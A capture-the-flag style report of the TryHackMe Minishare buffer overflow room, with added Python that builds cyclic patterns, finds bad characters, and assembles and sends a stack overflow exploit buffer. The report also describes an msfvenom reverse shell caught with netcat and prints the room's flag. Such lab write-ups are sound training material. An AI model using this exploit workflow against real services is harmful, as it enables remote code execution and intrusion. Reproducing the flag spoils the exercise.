Buffer Overflow BOF - E2: Testing Organization
BOF_E2
Tester's Name: M S V S Pavan
TryHackMe ID: pavanmsvs
Test Date: 10/07/2021
The purpose of this test was to find a vulnerability in the given application and use it to gain user access.
Nmap was used to identify the port on which the application is running, msfvenom to generate the payload, and the Metasploit framework tools pattern_create.rb and pattern_offset.rb to find the offset value.
From the nmap scan we can see that port 8888 is open and our application is running on that port. We were provided with a skeleton exploit, which we modify to gain user access. From another port, in a bin directory, we obtained the vulnerable application, downloaded it and transferred it to our testing machine, where we test our code and try to gain user access.
We obtained the skeleton exploit from TryHackMe.
Next, extract the downloaded zip file on the Windows system and start the application.
EXPLOITING THE TARGET
We start testing on the local development system using the skeleton. Only the target IP in the skeleton is changed to that of the local testing system. Start the application and run crash.py to check whether the application crashes.
As the application crashed when 6000 "A" characters were sent to it, we now create a unique pattern and repeat the crash with it to obtain the offset value.
For this we use the Metasploit script pattern_create.rb, which generates a non-repeating character pattern of the length we specify:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
We then put this pattern in place of the "A"s in our skeleton.
With the 500-character pattern in the code, we execute it to get the offset value (the exact point at which the crash overwrites EIP).
After executing the code we see the EIP value, which we use to find the offset, and at the ESP address we can see our pattern. To find the offset we use the companion Metasploit tool pattern_offset.rb, passing it the EIP value (pattern_offset.rb -q <EIP> -l 500); it returns the position of those four bytes within the pattern.
As seen above, using the EIP value we found that the offset of the application is 146. We now use this value in our code to control EIP.
We use the skeleton with the offset value in it and append four extra "B" characters to confirm EIP control.
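The offset step above depends on two Metasploit scripts. As an added example (not part of the report or the TryHackMe skeleton), the following pure-Python equivalent generates the same Aa0Aa1... cyclic pattern and locates a crashed EIP value in it, which also shows why the register value must be treated as little-endian before searching. The 0x39654138 value in the usage comment is computed from the pattern, not taken from the report.

```python
"""Re-implementation of pattern_create.rb / pattern_offset.rb (added example)."""
import string
import struct
from itertools import product

# Metasploit's pattern is built from triplets UPPER + lower + digit with the
# digit varying fastest: Aa0 Aa1 ... Aa9 Ab0 Ab1 ... Zz9 (20280 bytes before
# the triplets would repeat and the offset would become ambiguous).
_MAX_UNIQUE = 26 * 26 * 10 * 3


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the cyclic pattern."""
    if not 0 < length <= _MAX_UNIQUE:
        raise ValueError(f"length must be 1..{_MAX_UNIQUE} for a unique pattern")
    out = bytearray()
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(value, length: int) -> int:
    """Locate a crashed register value in a pattern of `length` bytes.

    `value` may be an int or a hex string as shown by the debugger
    (e.g. "39654138" or "0x39654138"). x86 is little-endian, so the
    register holds the four bytes in reverse order; struct.pack("<I")
    restores the order in which they sat in the buffer.
    """
    if isinstance(value, str):
        value = int(value, 16)
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("value not found in pattern; EIP may not be pattern-controlled")
    return idx


if __name__ == "__main__":
    # Example run: a 500-byte pattern, EIP read from the debugger after the crash.
    print(pattern_create(500)[:24].decode())
    print(pattern_offset("39654138", 500))   # 146, matching the report's offset
```

If `pattern_offset` raises, EIP was not overwritten by the pattern bytes (a partial overwrite, a different register, or a pattern shorter than the crash buffer); in that case regenerate the pattern at the full crash length rather than guessing.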
As seen, EIP now holds 42424242, the hex value of the four "B" characters we appended. Having controlled EIP, we next find the bad characters for the application. For this we use the built-in mona module of Immunity Debugger: we first configure a log folder and then generate a bytearray with mona.
Once the bytearray has been generated with mona, we copy it into our code and execute it.
It can simply be appended to the buffer as the bad-character test data, or passed as the buf value after the offset padding and EIP bytes in the skeleton.
After executing the code we identify the bad characters present in the application, which we then have to remove.
We note the ESP value and use mona to compare the bytearray.bin file against memory at that address:
!mona compare -f c:\logs\minishare\bytearray.bin -a 032638D0
This mona command is used to find the bad characters; the address passed with -a must be the ESP value read from the register window at the time of the crash. The result says corruption after 1 byte, so we remove the first bad character from the bytearray and execute the code again. To remove the bad character from the log folder's bytearray we use the mona command.
The same character is removed from our code as well, and we execute again to see whether any other bad character is present.
This time the result says corruption after 0 bytes, so we remove that character from the bytearray and execute the code again, using the mona command to remove it from the log folder's bytearray as before.
Again the character is removed from our code as well, and we execute to see whether any further bad character is present.
After removing the bad characters and executing the code, we compare again with mona and the status is unmodified, which means the application has no more bad characters.
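The iteration above (generate a bytearray, compare it against memory at ESP, drop the first corrupted byte, repeat until mona reports unmodified) can be reproduced as code. The following is an added example, not the report's skeleton or mona itself: it builds the bytearray with the current exclusions, performs the same byte-by-byte comparison, and loops until the dump is unmodified. The `fake_target` function is a constructed stand-in that truncates at a null byte and drops \x0a and \x0d, chosen only to exercise the loop; the report does not state which bytes Minishare mangles beyond what the compare output shows.

```python
"""Bad-character discovery loop, mirroring !mona bytearray / !mona compare (added example)."""


def make_bytearray(exclude=(0x00,)) -> bytes:
    """All 256 byte values in order, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def compare(expected: bytes, dump: bytes):
    """Diff the sent bytearray against what landed in memory.

    Returns (status, n, byte): mona's "corruption after n bytes" with the
    byte that was expected at position n. A bad byte may also truncate the
    copy (e.g. a string terminator), which is reported as "truncated".
    """
    for i, (e, d) in enumerate(zip(expected, dump)):
        if e != d:
            return ("corrupted", i, e)
    if len(dump) < len(expected):
        return ("truncated", len(dump), expected[len(dump)])
    return ("unmodified", len(expected), None)


def find_bad_chars(send_and_dump, exclude=(0x00,), max_rounds=32) -> list:
    """Repeat send/compare, removing the first corrupted byte each round.

    `send_and_dump(arr)` must send `arr` to the target and return the bytes
    found at ESP afterwards. One bad byte per round is the conservative
    choice: the byte after a bad one is often reported corrupted only
    because of the preceding one, so never trust a single compare output.
    """
    bad = list(exclude)
    for _ in range(max_rounds):
        arr = make_bytearray(bad)
        status, _n, byte = compare(arr, send_and_dump(arr))
        if status == "unmodified":
            return bad
        if byte in bad:
            raise RuntimeError("memory corrupted at a byte already excluded")
        bad.append(byte)
    raise RuntimeError("too many rounds; check the ESP address passed to compare")


def msfvenom_badchars(bad) -> str:
    """Format the list for msfvenom -b, e.g. '\\x00\\x0a\\x0d'."""
    return "".join(f"\\x{b:02x}" for b in bad)


def fake_target(buf: bytes) -> bytes:
    """Constructed stand-in for the vulnerable service (not Minishare):
    copies the buffer up to the first null and drops CR and LF."""
    return buf.split(b"\x00")[0].replace(b"\x0d", b"").replace(b"\x0a", b"")


if __name__ == "__main__":
    bad = find_bad_chars(fake_target)
    print([hex(b) for b in bad], msfvenom_badchars(bad))
```

In a real run `send_and_dump` is the step the report performs by hand: send the buffer with the skeleton, then read memory at the ESP shown in the debugger (the -a argument to mona compare).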
Searching for a JMP ESP address directly with mona did not give us a usable result, but the TryHackMe room provides a hint.
Now we are ready to create our payload with msfvenom to gain user control and obtain a shell on the testing system.
The -b option tells msfvenom which bad characters to exclude from the encoded payload. We copy the generated buf value into our code, adapt it to the provided skeleton, and add the JMP ESP address (the return address written into EIP) followed by NOP padding: padding = "\x90" * 16.
Before executing the code we open a listener on port 4444, the LPORT given in the payload, using netcat (nc -nvlp 4444) to catch the shell.
On executing the exploit we obtained a shell on the local system, confirming that the shellcode works. We then created a payload for the THM machine: as we are connected over the VPN, the tun0 IP is used as LHOST in the payload, and the target IP in our code is changed to the THM machine.
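The final buffer the report assembles is: offset padding, the JMP ESP address, the NOP sled, then the msfvenom shellcode. The following is an added example of that layout as a checkable function, not the TryHackMe skeleton; it refuses to build a buffer whose return address or shellcode contains a bad character, since such a byte would corrupt the buffer before it reaches EIP or ESP. The offset (146), the 16-byte NOP sled and port 8888 are the report's values; the JMP ESP address, the shellcode, the bad-character list and any prefix or suffix the service expects are placeholders to be replaced with the values found during testing.

```python
"""Exploit buffer layout with bad-character checking (added example)."""
import socket
import struct
import sys

# Values from the report.
OFFSET = 146                 # bytes before EIP, from pattern_offset.rb
NOP_SLED = b"\x90" * 16      # padding used in the skeleton
TARGET_PORT = 8888           # port found with nmap


def has_bad_chars(data: bytes, bad: bytes) -> set:
    """Return the set of bad byte values that occur in data."""
    return {b for b in bad if b in data}


def build_exploit(jmp_esp: int, shellcode: bytes, bad: bytes = b"\x00",
                  prefix: bytes = b"", suffix: bytes = b"") -> bytes:
    """Assemble prefix + padding + JMP ESP + NOP sled + shellcode + suffix.

    The return address is packed little-endian so that EIP reads it back as
    the intended 32-bit value. Both the address and the shellcode are checked
    against the bad-character list found with mona; the padding and the NOP
    sled contain only bytes we already know are safe.
    """
    eip = struct.pack("<I", jmp_esp)
    for name, blob in (("JMP ESP address", eip), ("shellcode", shellcode)):
        found = has_bad_chars(blob, bad)
        if found:
            raise ValueError(f"{name} contains bad chars: {[hex(b) for b in sorted(found)]}")
    return prefix + b"A" * OFFSET + eip + NOP_SLED + shellcode + suffix


def send_exploit(host: str, buf: bytes, port: int = TARGET_PORT, timeout: float = 5) -> int:
    """Deliver the buffer over TCP and return the number of bytes sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(buf)
    return len(buf)


if __name__ == "__main__":
    # Placeholders (hypothetical): replace JMP_ESP with the address found in
    # the debugger and SHELLCODE with the buf from msfvenom -b '<badchars>'.
    JMP_ESP = 0x11223344
    SHELLCODE = b"\xcc" * 8            # int3 stand-in, constructed for the example
    BAD = b"\x00"                      # extend with the bytes mona reported
    exploit = build_exploit(JMP_ESP, SHELLCODE, bad=BAD)
    if len(sys.argv) > 1:
        send_exploit(sys.argv[1], exploit)   # target IP given on the command line
    else:
        print(f"built {len(exploit)}-byte buffer; pass a target IP to send it")
```

Start the netcat listener on LPORT before running, exactly as the report does; the check in `build_exploit` is what catches the common case where an otherwise good JMP ESP address contains one of the bytes the application mangles.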
Minishare_proof.txt flag: - BD87238361767F91DB548CD0FD8CA8A09BB664E5A
We successfully gained user access to the system, obtained the flag and submitted it on THM.